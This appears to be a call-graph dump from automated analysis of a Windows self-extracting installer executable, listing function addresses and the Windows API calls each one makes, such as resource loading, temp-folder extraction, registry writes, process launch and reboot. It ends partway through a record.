2400->2403 2402->2385 2402->2386 2403->2402 2407 7ff636342e4f 2407->2400 2408 7ff636342e59 2407->2408 2409 7ff636342e84 2407->2409 2411 7ff636344f2c 24 API calls 2408->2411 2412 7ff636342e8d ExitWindowsEx 2409->2412 2413 7ff636342ea0 2409->2413 2414 7ff636342e7f 2411->2414 2412->2400 2532 7ff636341bf4 GetCurrentProcess OpenProcessToken 2413->2532 2414->2400 2414->2409 2417 7ff636348da9 2416->2417 2418 7ff636342f21 memset memset 2417->2418 2540 7ff6363451f8 FindResourceA SizeofResource 2418->2540 2421 7ff636342f7b CreateEventA SetEvent 2422 7ff6363451f8 7 API calls 2421->2422 2424 7ff636342fba 2422->2424 2423 7ff6363430dd 2425 7ff636344f2c 24 API calls 2423->2425 2426 7ff636342fbe 2424->2426 2428 7ff636342ffd 2424->2428 2431 7ff6363430cb 2424->2431 2427 7ff636343101 2425->2427 2429 7ff636344f2c 24 API calls 2426->2429 2430 7ff6363486f0 7 API calls 2427->2430 2432 7ff6363451f8 7 API calls 2428->2432 2433 7ff636342fdc 2429->2433 2434 7ff636342dfa 2430->2434 2545 7ff636347320 2431->2545 2436 7ff636343014 2432->2436 2433->2427 2434->2400 2462 7ff636343214 2434->2462 2436->2426 2437 7ff636343026 CreateMutexA 2436->2437 2437->2431 2439 7ff63634304a GetLastError 2437->2439 2439->2431 2443 7ff63634305d 2439->2443 2440 7ff6363430ec 2441 7ff636343106 FindResourceExA 2440->2441 2442 7ff6363430f5 2440->2442 2445 7ff636343127 LoadResource 2441->2445 2446 7ff63634313c 2441->2446 2572 7ff636342034 2442->2572 2447 7ff63634308a 2443->2447 2448 7ff636343072 2443->2448 2445->2446 2450 7ff636343151 2446->2450 2451 7ff636343145 #17 2446->2451 2452 7ff636344f2c 24 API calls 2447->2452 2449 7ff636344f2c 24 API calls 2448->2449 2453 7ff636343088 2449->2453 2450->2427 2454 7ff636343162 2450->2454 2451->2450 2455 7ff6363430a4 2452->2455 2456 7ff6363430a9 CloseHandle 2453->2456 2587 7ff636343d34 GetVersionExA 2454->2587 2455->2431 2455->2456 2456->2427 2461 7ff636347d28 28 API calls 2461->2433 2463 7ff636343269 2462->2463 2464 7ff63634323e 2462->2464 2700 7ff6363461d4 2463->2700 2466 7ff63634325c 2464->2466 2680 7ff636346294 2464->2680 2859 7ff636344064 2466->2859 2474 7ff6363486f0 7 API calls 2476 7ff636342e07 2474->2476 2475 7ff636343283 GetSystemDirectoryA 2477 7ff636347e08 CharPrevA 2475->2477 2508 7ff6363463dc 2476->2508 2478 7ff6363432ae LoadLibraryA 2477->2478 2479 7ff6363432c7 GetProcAddress 2478->2479 2480 7ff6363432fb FreeLibrary 2478->2480 2479->2480 2481 7ff6363432e2 DecryptFileA 2479->2481 2482 7ff636343316 2480->2482 2483 7ff6363433a5 SetCurrentDirectoryA 2480->2483 2481->2480 2482->2483 2485 7ff636343322 GetWindowsDirectoryA 2482->2485 2484 7ff63634333f 2483->2484 2490 7ff6363433c3 2483->2490 2488 7ff636344f2c 24 API calls 2484->2488 2485->2484 2486 7ff63634338c 2485->2486 2763 7ff636346f14 2486->2763 2487 7ff636343451 2493 7ff6363423c0 19 API calls 2487->2493 2499 7ff636343479 2487->2499 2500 7ff636343368 2487->2500 2491 7ff63634335d 2488->2491 2490->2487 2494 7ff63634342d 2490->2494 2496 7ff6363433fd 2490->2496 2878 7ff636347958 GetLastError 2491->2878 2493->2499 2791 7ff636345f80 2494->2791 2502 7ff636347d28 28 API calls 2496->2502 2497 7ff636343362 2497->2500 2501 7ff63634349a 2499->2501 2813 7ff6363441b4 2499->2813 2500->2474 2501->2500 2504 7ff6363434b5 2501->2504 2505 7ff636343428 2502->2505 2889 7ff636344a54 2504->2889 2505->2500 2879 7ff636347984 2505->2879 2509 7ff636346404 2508->2509 2510 7ff63634643c LocalFree LocalFree 2509->2510 2512 7ff636346419 SetFileAttributesA DeleteFileA 2509->2512 2518 7ff636346463 2509->2518 2510->2509 2511 7ff636346501 2513 7ff636346577 2511->2513 2515 7ff63634651d RegOpenKeyExA 2511->2515 2512->2510 2514 7ff6363486f0 7 API calls 2513->2514 2516 7ff636342e0e 2514->2516 2515->2513 2517 7ff63634654e RegDeleteValueA RegCloseKey 2515->2517 2516->2400 2516->2407 2522 7ff6363423c0 2516->2522 2517->2513 2518->2511 2519 7ff6363464e4 SetCurrentDirectoryA 2518->2519 2520 7ff636347ea0 4 API calls 2518->2520 2521 7ff636342034 16 API calls 2519->2521 2520->2519 2521->2511 2523 7ff636342478 2522->2523 2524 7ff6363423d1 2522->2524 3125 7ff636342234 GetWindowsDirectoryA 2523->3125 2526 7ff6363423db 2524->2526 2527 7ff636342471 2524->2527 2528 7ff63634246b 2526->2528 2530 7ff6363423eb RegOpenKeyExA 2526->2530 3122 7ff636342308 RegOpenKeyExA 2527->3122 2528->2407 2530->2528 2531 7ff636342420 RegQueryValueExA RegCloseKey 2530->2531 2531->2528 2533 7ff636341c57 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2532->2533 2534 7ff636341c34 2532->2534 2533->2534 2535 7ff636341cd4 ExitWindowsEx 2533->2535 2536 7ff636344f2c 24 API calls 2534->2536 2535->2534 2537 7ff636341c50 2535->2537 2536->2537 2538 7ff6363486f0 7 API calls 2537->2538 2539 7ff636341d02 2538->2539 2539->2400 2541 7ff636345243 2540->2541 2542 7ff636342f6b 2540->2542 2541->2542 2543 7ff63634524c FindResourceA LoadResource LockResource 2541->2543 2542->2421 2542->2423 2543->2542 2544 7ff63634528b memcpy_s FreeResource 2543->2544 2544->2542 2546 7ff6363477de 2545->2546 2558 7ff63634736a 2545->2558 2547 7ff6363486f0 7 API calls 2546->2547 2549 7ff6363430d9 2547->2549 2548 7ff636347442 2548->2546 2551 7ff63634745f GetModuleFileNameA 2548->2551 2549->2423 2549->2440 2550 7ff636347395 CharNextA 2550->2558 2552 7ff636347487 2551->2552 2553 7ff636347494 2551->2553 2621 7ff636347fb8 2552->2621 2553->2546 2555 7ff63634794b 2633 7ff6363488c8 RtlCaptureContext RtlLookupFunctionEntry 2555->2633 2558->2546 2558->2548 2558->2550 2558->2555 2559 7ff6363474b0 CharUpperA 2558->2559 2565 7ff636347615 CharUpperA 2558->2565 2566 7ff636347673 CharUpperA 2558->2566 2567 7ff636347f48 IsDBCSLeadByte CharNextA 2558->2567 2568 7ff6363475be CompareStringA 2558->2568 2569 7ff63634770a CharUpperA 2558->2569 2570 7ff636347548 CharUpperA 2558->2570 2626 7ff636347e08 2558->2626 2559->2558 2560 7ff6363478e7 2559->2560 2630 7ff636341bc0 2560->2630 2563 7ff6363478f8 CloseHandle 2564 7ff636347904 ExitProcess 2563->2564 2565->2558 2566->2558 2567->2558 2568->2558 2569->2558 2570->2558 2573 7ff636342213 2572->2573 2576 7ff63634203d 2572->2576 2573->2427 2574 7ff636342204 2575 7ff6363486f0 7 API calls 2574->2575 2575->2573 2576->2574 2577 7ff6363420cd FindFirstFileA 2576->2577 2577->2574 2578 7ff6363420ef 2577->2578 2579 7ff636342129 lstrcmpA 2578->2579 2581 7ff6363421ca FindNextFileA 2578->2581 2582 7ff636342194 2578->2582 2585 7ff636347e08 CharPrevA 2578->2585 2586 7ff636342034 8 API calls 2578->2586 2580 7ff636342149 lstrcmpA 2579->2580 2579->2581 2580->2578 2580->2581 2581->2578 2584 7ff6363421e6 FindClose RemoveDirectoryA 2581->2584 2583 7ff6363421a5 SetFileAttributesA DeleteFileA 2582->2583 2583->2581 2584->2574 2585->2578 2586->2578 2588 7ff636343d8a 2587->2588 2593 7ff636343d91 2587->2593 2589 7ff636344f2c 24 API calls 2588->2589 2590 7ff636343ffb 2589->2590 2591 7ff6363486f0 7 API calls 2590->2591 2592 7ff63634316a 2591->2592 2592->2427 2602 7ff636341258 2592->2602 2593->2588 2593->2590 2595 7ff636343ef5 2593->2595 2639 7ff636342898 2593->2639 2595->2588 2595->2590 2596 7ff636343fae MessageBeep 2595->2596 2597 7ff636348154 13 API calls 2596->2597 2598 7ff636343fc1 2597->2598 2599 7ff636343fca MessageBoxA 2598->2599 2600 7ff636348084 2 API calls 2598->2600 2599->2590 2600->2599 2603 7ff6363412a8 2602->2603 2604 7ff636341421 2602->2604 2671 7ff636341130 LoadLibraryA 2603->2671 2605 7ff6363486f0 7 API calls 2604->2605 2607 7ff636341446 2605->2607 2607->2427 2607->2461 2609 7ff6363412b9 GetCurrentProcess OpenProcessToken 2609->2604 2610 7ff6363412e3 GetTokenInformation 2609->2610 2611 7ff63634140c CloseHandle 2610->2611 2612 7ff63634130c GetLastError 2610->2612 2611->2604 2612->2611 2613 7ff636341321 LocalAlloc 2612->2613 2613->2611 2614 7ff63634133e GetTokenInformation 2613->2614 2615 7ff636341368 AllocateAndInitializeSid 2614->2615 2616 7ff6363413fd LocalFree 2614->2616 2615->2616 2619 7ff6363413b1 2615->2619 2616->2611 2617 7ff6363413ed FreeSid 2617->2616 2618 7ff6363413be EqualSid 2618->2619 2620 7ff6363413e2 2618->2620 2619->2617 2619->2618 2619->2620 2620->2617 2622 7ff636348029 2621->2622 2624 7ff636347fd8 2621->2624 2622->2553 2623 7ff636347fe0 IsDBCSLeadByte 2623->2624 2624->2623 2625 7ff636348006 CharNextA 2624->2625 2625->2622 2625->2624 2627 7ff636347e28 2626->2627 2627->2627 2628 7ff636347e4c CharPrevA 2627->2628 2629 7ff636347e3a 2627->2629 2628->2629 2629->2558 2631 7ff636344f2c 24 API calls 2630->2631 2632 7ff636341be7 2631->2632 2632->2563 2632->2564 2634 7ff636348947 2633->2634 2635 7ff636348905 RtlVirtualUnwind 2633->2635 2638 7ff636348714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2634->2638 2635->2634 2646 7ff636342a9a 2639->2646 2648 7ff6363428d5 2639->2648 2640 7ff636342abf GlobalFree 2641 7ff636342aaa 2640->2641 2641->2595 2643 7ff636342908 GetFileVersionInfoSizeA 2644 7ff636342926 GlobalAlloc 2643->2644 2643->2648 2644->2641 2645 7ff636342946 GlobalLock 2644->2645 2645->2646 2647 7ff636342961 GetFileVersionInfoA 2645->2647 2646->2640 2646->2641 2647->2648 2649 7ff636342985 VerQueryValueA 2647->2649 2648->2643 2648->2646 2650 7ff636342a59 GlobalUnlock 2648->2650 2651 7ff636342a3e GlobalUnlock 2648->2651 2652 7ff636342644 2648->2652 2649->2648 2649->2650 2650->2648 2651->2640 2653 7ff636342849 GetSystemDirectoryA 2652->2653 2654 7ff636342683 CharUpperA CharNextA CharNextA 2652->2654 2658 7ff636342843 2653->2658 2655 7ff63634282f GetSystemDirectoryA 2654->2655 2656 7ff6363426c4 2654->2656 2655->2658 2657 7ff636342819 GetWindowsDirectoryA 2656->2657 2660 7ff6363426ce 2656->2660 2657->2658 2659 7ff636347e08 CharPrevA 2658->2659 2661 7ff63634286a 2658->2661 2659->2661 2664 7ff636347e08 CharPrevA 2660->2664 2662 7ff6363486f0 7 API calls 2661->2662 2663 7ff636342879 2662->2663 2663->2648 2665 7ff63634272d RegOpenKeyExA 2664->2665 2665->2658 2666 7ff636342760 RegQueryValueExA 2665->2666 2667 7ff636342806 RegCloseKey 2666->2667 2668 7ff636342793 2666->2668 2667->2658 2669 7ff63634279c ExpandEnvironmentStringsA 2668->2669 2670 7ff6363427ba 2668->2670 2669->2670 2670->2667 2672 7ff636341229 2671->2672 2673 7ff636341185 GetProcAddress 2671->2673 2676 7ff6363486f0 7 API calls 2672->2676 2674 7ff63634121a FreeLibrary 2673->2674 2675 7ff6363411a3 AllocateAndInitializeSid 2673->2675 2674->2672 2675->2674 2678 7ff6363411ec FreeSid 2675->2678 2677 7ff636341238 2676->2677 2677->2604 2677->2609 2678->2674 2681 7ff6363451f8 7 API calls 2680->2681 2682 7ff6363462af LocalAlloc 2681->2682 2683 7ff6363462cd 2682->2683 2684 7ff6363462fb 2682->2684 2685 7ff636344f2c 24 API calls 2683->2685 2686 7ff6363451f8 7 API calls 2684->2686 2687 7ff6363462eb 2685->2687 2688 7ff63634630d 2686->2688 2902 7ff636347958 GetLastError 2687->2902 2690 7ff63634634a lstrcmpA 2688->2690 2691 7ff636346311 2688->2691 2693 7ff63634637a 2690->2693 2694 7ff636346364 LocalFree 2690->2694 2692 7ff636344f2c 24 API calls 2691->2692 2697 7ff63634632f LocalFree 2692->2697 2696 7ff636344f2c 24 API calls 2693->2696 2695 7ff63634324b 2694->2695 2695->2463 2695->2466 2695->2500 2698 7ff63634639c LocalFree 2696->2698 2697->2695 2699 7ff6363462f0 2698->2699 2699->2695 2701 7ff6363451f8 7 API calls 2700->2701 2702 7ff6363461f1 2701->2702 2703 7ff6363461f6 2702->2703 2704 7ff63634623a 2702->2704 2706 7ff636344f2c 24 API calls 2703->2706 2705 7ff6363451f8 7 API calls 2704->2705 2707 7ff636346253 2705->2707 2713 7ff636346215 2706->2713 2709 7ff636347984 13 API calls 2707->2709 2708 7ff63634326e 2708->2500 2714 7ff6363468f0 2708->2714 2710 7ff63634625f 2709->2710 2710->2708 2711 7ff636346263 2710->2711 2712 7ff636344f2c 24 API calls 2711->2712 2712->2713 2713->2708 2715 7ff6363451f8 7 API calls 2714->2715 2716 7ff636346932 LocalAlloc 2715->2716 2717 7ff636346982 2716->2717 2718 7ff636346952 2716->2718 2720 7ff6363451f8 7 API calls 2717->2720 2719 7ff636344f2c 24 API calls 2718->2719 2721 7ff636346970 2719->2721 2722 7ff636346994 2720->2722 2927 7ff636347958 GetLastError 2721->2927 2724 7ff636346998 2722->2724 2725 7ff6363469d1 lstrcmpA LocalFree 2722->2725 2728 7ff636344f2c 24 API calls 2724->2728 2726 7ff636346a18 2725->2726 2727 7ff636346a63 2725->2727 2734 7ff636346710 53 API calls 2726->2734 2730 7ff636346d40 2727->2730 2733 7ff636346a7b GetTempPathA 2727->2733 2731 7ff6363469b6 LocalFree 2728->2731 2729 7ff63634697b 2735 7ff6363486f0 7 API calls 2729->2735 2732 7ff636347d28 28 API calls 2730->2732 2731->2729 2732->2729 2736 7ff636346a9e 2733->2736 2750 7ff636346ad1 2733->2750 2737 7ff636346a38 2734->2737 2738 7ff63634327b 2735->2738 2903 7ff636346710 2736->2903 2737->2729 2740 7ff636346a40 2737->2740 2738->2475 2738->2500 2742 7ff636344f2c 24 API calls 2740->2742 2744 7ff636346975 2742->2744 2744->2729 2745 7ff636346d07 GetWindowsDirectoryA 2748 7ff636346f14 38 API calls 2745->2748 2746 7ff636346b25 GetDriveTypeA 2749 7ff636346b42 GetFileAttributesA 2746->2749 2761 7ff636346b3d 2746->2761 2748->2750 2749->2761 2750->2729 2750->2745 2750->2746 2751 7ff636346710 53 API calls 2751->2750 2752 7ff636346f14 38 API calls 2752->2761 2753 7ff636346b81 GetDiskFreeSpaceA 2755 7ff636346baf MulDiv 2753->2755 2753->2761 2754 7ff636342490 25 API calls 2754->2761 2755->2761 2756 7ff636346c2e GetWindowsDirectoryA 2756->2761 2757 7ff636347e08 CharPrevA 2758 7ff636346c56 GetFileAttributesA 2757->2758 2759 7ff636346c6c CreateDirectoryA 2758->2759 2758->2761 2759->2761 2760 7ff636346c99 SetFileAttributesA 2760->2761 2761->2729 2761->2745 2761->2746 2761->2749 2761->2752 2761->2753 2761->2754 2761->2756 2761->2757 2761->2760 2762 7ff636346710 53 API calls 2761->2762 2762->2761 2764 7ff636346f63 GetCurrentDirectoryA SetCurrentDirectoryA 2763->2764 2790 7ff636346f5b 2763->2790 2765 7ff636346fbb GetDiskFreeSpaceA 2764->2765 2766 7ff636346f8e 2764->2766 2767 7ff636346ffc MulDiv 2765->2767 2768 7ff6363471da memset 2765->2768 2770 7ff636344f2c 24 API calls 2766->2770 2767->2768 2772 7ff63634702a GetVolumeInformationA 2767->2772 2978 7ff636347958 GetLastError 2768->2978 2769 7ff6363486f0 7 API calls 2773 7ff6363433a1 2769->2773 2774 7ff636346fab 2770->2774 2776 7ff6363470c1 SetCurrentDirectoryA 2772->2776 2777 7ff636347062 memset 2772->2777 2773->2483 2773->2500 2959 7ff636347958 GetLastError 2774->2959 2775 7ff6363471f2 GetLastError FormatMessageA 2779 7ff636347234 2775->2779 2785 7ff6363470e9 2776->2785 2960 7ff636347958 GetLastError 2777->2960 2782 7ff636344f2c 24 API calls 2779->2782 2781 7ff636346fb0 2781->2790 2784 7ff63634724f SetCurrentDirectoryA 2782->2784 2783 7ff63634707a GetLastError FormatMessageA 2783->2779 2784->2790 2786 7ff63634712c 2785->2786 2787 7ff636347150 2785->2787 2788 7ff636344f2c 24 API calls 2786->2788 2787->2790 2961 7ff636342520 2787->2961 2788->2781 2790->2769 2792 7ff6363451f8 7 API calls 2791->2792 2793 7ff636345f9b FindResourceA LoadResource LockResource 2792->2793 2794 7ff636345fec 2793->2794 2810 7ff6363461bf 2793->2810 2795 7ff636345ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 2794->2795 2796 7ff636346046 2794->2796 2795->2796 2979 7ff636345e44 #20 2796->2979 2799 7ff636346059 #20 2800 7ff63634604f 2799->2800 2801 7ff6363460c1 #22 2799->2801 2804 7ff636344f2c 24 API calls 2800->2804 2802 7ff636346145 2801->2802 2803 7ff636346105 #23 2801->2803 2806 7ff636346151 FreeResource 2802->2806 2807 7ff636346165 2802->2807 2803->2800 2803->2802 2805 7ff636346143 2804->2805 2805->2802 2806->2807 2808 7ff63634618f 2807->2808 2809 7ff636346171 2807->2809 2808->2810 2812 7ff6363461a1 SendMessageA 2808->2812 2811 7ff636344f2c 24 API calls 2809->2811 2810->2505 2811->2808 2812->2810 2814 7ff636344208 2813->2814 2830 7ff63634421f 2813->2830 2816 7ff6363451f8 7 API calls 2814->2816 2815 7ff636344235 memset 2815->2830 2816->2830 2817 7ff63634434a 2818 7ff636344f2c 24 API calls 2817->2818 2856 7ff636344369 2818->2856 2819 7ff6363445e9 2821 7ff6363486f0 7 API calls 2819->2821 2822 7ff6363445fa 2821->2822 2822->2501 2823 7ff6363443eb CompareStringA 2824 7ff6363446d3 2823->2824 2823->2830 2824->2819 2825 7ff6363446ed RegOpenKeyExA 2824->2825 2825->2819 2828 7ff636344722 RegQueryValueExA 2825->2828 2826 7ff636344694 2831 7ff636344f2c 24 API calls 2826->2831 2833 7ff636344817 RegCloseKey 2828->2833 2834 7ff636344767 memset GetSystemDirectoryA 2828->2834 2829 7ff6363451f8 7 API calls 2829->2830 2830->2815 2830->2817 2830->2819 2830->2823 2830->2824 2830->2826 2830->2829 2835 7ff63634448a 2830->2835 2836 7ff6363445a8 LocalFree 2830->2836 2837 7ff6363445da LocalFree 2830->2837 2841 7ff6363442ed CompareStringA 2830->2841 2991 7ff6363415f4 2830->2991 3030 7ff636341d10 memset memset RegCreateKeyExA 2830->3030 3057 7ff636344838 2830->3057 2838 7ff6363446b3 LocalFree 2831->2838 2833->2819 2839 7ff636344798 2834->2839 2840 7ff6363447ae 2834->2840 2846 7ff63634449b GetProcAddress 2835->2846 2847 7ff63634466f 2835->2847 2857 7ff636344580 FreeLibrary 2835->2857 2858 7ff6363445ce FreeLibrary 2835->2858 3073 7ff636347c50 2835->3073 2836->2824 2836->2830 2837->2819 2838->2819 2843 7ff636347e08 CharPrevA 2839->2843 2844 7ff6363410bc _vsnprintf 2840->2844 2841->2830 2843->2840 2845 7ff6363447d7 RegSetValueExA 2844->2845 2845->2833 2846->2835 2848 7ff63634461c 2846->2848 2849 7ff636344f2c 24 API calls 2847->2849 2850 7ff636344f2c 24 API calls 2848->2850 2852 7ff636344692 2849->2852 2853 7ff63634463f FreeLibrary 2850->2853 2854 7ff63634464e LocalFree 2852->2854 2853->2854 3083 7ff636347958 GetLastError 2854->3083 2856->2819 2857->2836 2858->2837 2860 7ff6363451f8 7 API calls 2859->2860 2861 7ff63634407b LocalAlloc 2860->2861 2862 7ff6363440cd 2861->2862 2863 7ff63634409d 2861->2863 2865 7ff6363451f8 7 API calls 2862->2865 2864 7ff636344f2c 24 API calls 2863->2864 2866 7ff6363440bb 2864->2866 2867 7ff6363440df 2865->2867 3121 7ff636347958 GetLastError 2866->3121 2869 7ff636344120 lstrcmpA 2867->2869 2870 7ff6363440e3 2867->2870 2872 7ff636344188 LocalFree 2869->2872 2873 7ff63634413e 2869->2873 2871 7ff636344f2c 24 API calls 2870->2871 2874 7ff636344101 LocalFree 2871->2874 2876 7ff636343261 2872->2876 2875 7ff636347d28 28 API calls 2873->2875 2874->2876 2877 7ff63634415e LocalFree 2875->2877 2876->2463 2876->2500 2877->2876 2878->2497 2880 7ff6363479e2 2879->2880 2881 7ff6363410bc _vsnprintf 2880->2881 2887 7ff636347a1a FreeResource 2880->2887 2888 7ff636347a65 FreeResource 2880->2888 2882 7ff636347a41 FindResourceA 2881->2882 2883 7ff6363479b6 LoadResource LockResource 2882->2883 2884 7ff636347a63 2882->2884 2883->2880 2883->2884 2885 7ff6363486f0 7 API calls 2884->2885 2886 7ff636347a90 2885->2886 2886->2487 2887->2880 2888->2884 2890 7ff6363451f8 7 API calls 2889->2890 2891 7ff636344a6f LocalAlloc 2890->2891 2892 7ff636344ab1 2891->2892 2893 7ff636344a91 2891->2893 2895 7ff6363451f8 7 API calls 2892->2895 2894 7ff636344f2c 24 API calls 2893->2894 2896 7ff636344aaf 2894->2896 2897 7ff636344ac3 2895->2897 2896->2500 2898 7ff636344add lstrcmpA 2897->2898 2899 7ff636344ac7 2897->2899 2898->2899 2900 7ff636344b16 LocalFree 2898->2900 2901 7ff636344f2c 24 API calls 2899->2901 2900->2896 2901->2900 2902->2699 2904 7ff636346809 2903->2904 2905 7ff636346742 2903->2905 2945 7ff636346d9c 2904->2945 2934 7ff6363465a8 2905->2934 2908 7ff636346886 2910 7ff6363486f0 7 API calls 2908->2910 2914 7ff6363468d2 2910->2914 2912 7ff6363467f8 2920 7ff636347e08 CharPrevA 2912->2920 2913 7ff6363467a3 GetSystemInfo 2922 7ff6363467bd 2913->2922 2914->2729 2928 7ff636342490 GetWindowsDirectoryA 2914->2928 2915 7ff636346856 CreateDirectoryA 2917 7ff63634686b 2915->2917 2918 7ff636346894 2915->2918 2916 7ff636346875 2919 7ff636346f14 38 API calls 2916->2919 2917->2916 2957 7ff636347958 GetLastError 2918->2957 2923 7ff636346882 2919->2923 2920->2904 2922->2912 2925 7ff636347e08 CharPrevA 2922->2925 2923->2908 2926 7ff6363468aa RemoveDirectoryA 2923->2926 2924 7ff636346899 2924->2908 2925->2912 2926->2908 2927->2744 2929 7ff6363424ec 2928->2929 2930 7ff6363424ce 2928->2930 2932 7ff6363486f0 7 API calls 2929->2932 2931 7ff636344f2c 24 API calls 2930->2931 2931->2929 2933 7ff636342507 2932->2933 2933->2750 2933->2751 2936 7ff6363465df 2934->2936 2935 7ff6363410bc _vsnprintf 2935->2936 2936->2935 2937 7ff636347e08 CharPrevA 2936->2937 2940 7ff63634666f GetTempFileNameA 2936->2940 2938 7ff636346640 RemoveDirectoryA GetFileAttributesA 2937->2938 2938->2936 2939 7ff6363466df CreateDirectoryA 2938->2939 2939->2940 2941 7ff6363466b4 2939->2941 2940->2941 2942 7ff63634668f DeleteFileA CreateDirectoryA 2940->2942 2943 7ff6363486f0 7 API calls 2941->2943 2942->2941 2944 7ff6363466c6 2943->2944 2944->2908 2944->2912 2944->2913 2946 7ff636346db7 2945->2946 2946->2946 2947 7ff636346dc0 LocalAlloc 2946->2947 2948 7ff636346de0 2947->2948 2952 7ff636346e21 2947->2952 2949 7ff636344f2c 24 API calls 2948->2949 2955 7ff636346dfe 2949->2955 2950 7ff636347e08 CharPrevA 2953 7ff636346e7f CreateFileA LocalFree 2950->2953 2952->2950 2954 7ff636346ecb CloseHandle GetFileAttributesA 2953->2954 2953->2955 2954->2955 2956 7ff636346852 2955->2956 2958 7ff636347958 GetLastError 2955->2958 2956->2915 2956->2916 2957->2924 2958->2956 2959->2781 2960->2783 2962 7ff63634254d 2961->2962 2963 7ff63634258a 2961->2963 2964 7ff6363410bc _vsnprintf 2962->2964 2965 7ff63634258f 2963->2965 2966 7ff6363425d3 2963->2966 2967 7ff636342565 2964->2967 2968 7ff6363410bc _vsnprintf 2965->2968 2970 7ff6363410bc _vsnprintf 2966->2970 2976 7ff636342585 2966->2976 2972 7ff636344f2c 24 API calls 2967->2972 2969 7ff6363425a7 2968->2969 2973 7ff636344f2c 24 API calls 2969->2973 2974 7ff6363425ef 2970->2974 2971 7ff6363486f0 7 API calls 2975 7ff636342631 2971->2975 2972->2976 2973->2976 2977 7ff636344f2c 24 API calls 2974->2977 2975->2790 2976->2971 2977->2976 2978->2775 2980 7ff636345ed1 2979->2980 2990 7ff636345f46 2979->2990 2981 7ff6363455c0 29 API calls 2980->2981 2983 7ff636345ee8 2981->2983 2982 7ff6363486f0 7 API calls 2984 7ff636345f5c 2982->2984 2985 7ff636345ef1 #21 2983->2985 2983->2990 2984->2799 2984->2800 2986 7ff636345f0c 2985->2986 2985->2990 2987 7ff6363459b0 CloseHandle 2986->2987 2986->2990 2988 7ff636345f2e 2987->2988 2989 7ff636345f33 #23 2988->2989 2988->2990 2989->2990 2990->2982 2992 7ff636341649 2991->2992 3084 7ff636341558 2992->3084 2995 7ff636347e08 CharPrevA 2997 7ff6363416dc 2995->2997 2996 7ff636347fb8 2 API calls 2998 7ff63634177f 2996->2998 2997->2996 2999 7ff636341788 CompareStringA 2998->2999 3000 7ff6363419d3 2998->3000 2999->3000 3002 7ff6363417bb GetFileAttributesA 2999->3002 3001 7ff636347fb8 2 API calls 3000->3001 3003 7ff6363419e0 3001->3003 3004 7ff6363419ab 3002->3004 3005 7ff6363417d5 3002->3005 3006 7ff6363419e9 CompareStringA 3003->3006 3007 7ff636341a83 LocalAlloc 3003->3007 3010 7ff636344f2c 24 API calls 3004->3010 3005->3004 3008 7ff636341558 2 API calls 3005->3008 3006->3007 3015 7ff636341a18 3006->3015 3007->3004 3009 7ff636341aa3 GetFileAttributesA 3007->3009 3011 7ff6363417f9 3008->3011 3012 7ff636341ab9 3009->3012 3029 7ff6363418c5 3010->3029 3013 7ff636341823 LocalAlloc 3011->3013 3016 7ff636341558 2 API calls 3011->3016 3027 7ff636341b0c 3012->3027 3013->3004 3017 7ff636341847 GetPrivateProfileIntA GetPrivateProfileStringA 3013->3017 3014 7ff6363486f0 7 API calls 3018 7ff636341b9e 3014->3018 3015->3015 3019 7ff636341a39 LocalAlloc 3015->3019 3016->3013 3020 7ff636341940 3017->3020 3017->3029 3018->2830 3019->3004 3024 7ff636341a6a 3019->3024 3022 7ff636341951 GetShortPathNameA 3020->3022 3023 7ff636341973 3020->3023 3022->3023 3028 7ff6363410bc _vsnprintf 3023->3028 3026 7ff6363410bc _vsnprintf 3024->3026 3025 7ff636341b82 3025->3014 3026->3029 3092 7ff636342ae8 3027->3092 3028->3029 3029->3025 3031 7ff636341db6 3030->3031 3032 7ff636341fff 3030->3032 3035 7ff6363410bc _vsnprintf 3031->3035 3039 7ff636341e0d 3031->3039 3033 7ff6363486f0 7 API calls 3032->3033 3034 7ff63634200e 3033->3034 3034->2830 3036 7ff636341dd6 RegQueryValueExA 3035->3036 3036->3031 3037 7ff636341e2c GetSystemDirectoryA 3036->3037 3038 7ff636347e08 CharPrevA 3037->3038 3040 7ff636341e50 LoadLibraryA 3038->3040 3039->3037 3041 7ff636341e0f RegCloseKey 3039->3041 3042 7ff636341e6c GetProcAddress FreeLibrary 3040->3042 3043 7ff636341f3b GetModuleFileNameA 3040->3043 3041->3032 3042->3043 3045 7ff636341ea4 GetSystemDirectoryA 3042->3045 3044 7ff636341f5e RegCloseKey 3043->3044 3048 7ff636341ece 3043->3048 3044->3032 3046 7ff636341ebb 3045->3046 3045->3048 3047 7ff636347e08 CharPrevA 3046->3047 3047->3048 3048->3048 3049 7ff636341ef7 LocalAlloc 3048->3049 3050 7ff636341f1b 3049->3050 3051 7ff636341f74 3049->3051 3053 7ff636344f2c 24 API calls 3050->3053 3052 7ff6363410bc _vsnprintf 3051->3052 3054 7ff636341faa 3052->3054 3055 7ff636341f39 3053->3055 3054->3054 3056 7ff636341fb3 RegSetValueExA RegCloseKey LocalFree 3054->3056 3055->3044 3056->3032 3058 7ff636344874 CreateProcessA 3057->3058 3068 7ff63634486d 3057->3068 3059 7ff6363449bb 3058->3059 3060 7ff6363448ca WaitForSingleObject GetExitCodeProcess 3058->3060 3120 7ff636347958 GetLastError 3059->3120 3064 7ff636344901 3060->3064 3062 7ff6363486f0 7 API calls 3065 7ff636344a37 3062->3065 3063 7ff6363449c0 GetLastError FormatMessageA 3066 7ff636344f2c 24 API calls 3063->3066 3070 7ff6363423c0 19 API calls 3064->3070 3072 7ff636344932 CloseHandle CloseHandle 3064->3072 3065->2830 3066->3068 3068->3062 3069 7ff6363449b2 3069->3068 3071 7ff636344955 3070->3071 3071->3072 3072->3068 3072->3069 3074 7ff636347c85 3073->3074 3075 7ff636347e08 CharPrevA 3074->3075 3076 7ff636347cc3 GetFileAttributesA 3075->3076 3077 7ff636347cd9 3076->3077 3078 7ff636347cf6 LoadLibraryA 3076->3078 3077->3078 3079 7ff636347cdd LoadLibraryExA 3077->3079 3080 7ff636347d09 3078->3080 3079->3080 3081 7ff6363486f0 7 API calls 3080->3081 3082 7ff636347d19 3081->3082 3082->2835 3083->2856 3085 7ff636341579 3084->3085 3087 7ff636341591 3085->3087 3088 7ff6363415c1 3085->3088 3106 7ff636347f48 3085->3106 3089 7ff636347f48 2 API calls 3087->3089 3088->2995 3088->2997 3090 7ff63634159f 3089->3090 3090->3088 3091 7ff636347f48 2 API calls 3090->3091 3091->3090 3093 7ff636342b1f 3092->3093 3094 7ff636342d41 3092->3094 3093->3094 3096 7ff636342b28 GetModuleFileNameA 3093->3096 3095 7ff6363486f0 7 API calls 